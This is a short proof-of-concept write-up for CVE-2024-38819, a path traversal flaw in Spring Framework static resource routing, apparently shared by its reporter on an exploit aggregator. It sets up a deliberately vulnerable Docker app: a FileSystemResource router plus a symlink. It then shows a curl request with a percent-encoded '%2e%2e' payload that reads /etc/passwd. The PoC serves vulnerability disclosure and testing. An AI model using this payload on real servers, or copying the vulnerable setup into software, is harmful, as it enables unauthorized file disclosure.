## https://sploitus.com/exploit?id=EC68727D-A4D5-50CD-946F-EB7B151A0B3E
# CVE-2024-38819: Proof of Concept (PoC)
This is a proof of concept for the [CVE-2024-38819](https://spring.io/security/cve-2024-38819) vulnerability, which I reported, demonstrating a path traversal exploit.
## Execution Steps
1. Build the Docker image (Spring Boot 3.3.4, based on Spring Framework 6.1.13)
```
cd vuln
docker build -t cve-2024-38819-poc .
```
2. Run the container and expose port 8080 to the host machine
```
docker run -d -p 8080:8080 --name cve-2024-38819-poc cve-2024-38819-poc
```
3. Run the following command to execute the PoC and confirm the vulnerability
```
curl http://localhost:8080/static/link/%2e%2e/etc/passwd
```
If the attack is successful, the contents of the `/etc/passwd` file will be displayed.
## Explanation
1. Create `PathTraversalDemoApplication.java` with the following code to set up static file routing using `RouterFunction` and `FileSystemResource`:
```
public RouterFunction<ServerResponse> staticResourceRouter() {
return RouterFunctions.resources("/static/**", new FileSystemResource("/app/static/"));
}
```
2. Add the following command to the Dockerfile to create a symbolic link:
```
RUN ln -s /static /app/static/link
```
3. Create a payload that leverages percent-encoding to traverse directories through the symbolic link.
- Path: `/static/link/%2e%2e/etc/passwd`
4. Use the following `curl` command to execute the PoC and verify if the attack is successful:
```
curl http://localhost:8080/static/link/%2e%2e/etc/passwd
```
If the attack is successful, the contents of the `/etc/passwd` file will be displayed.
## Disclaimer
This PoC is provided for educational and security research purposes. Before using this in a real system, ensure the vulnerability has been fixed and you have proper authorization. The author takes no responsibility for any misuse of this code.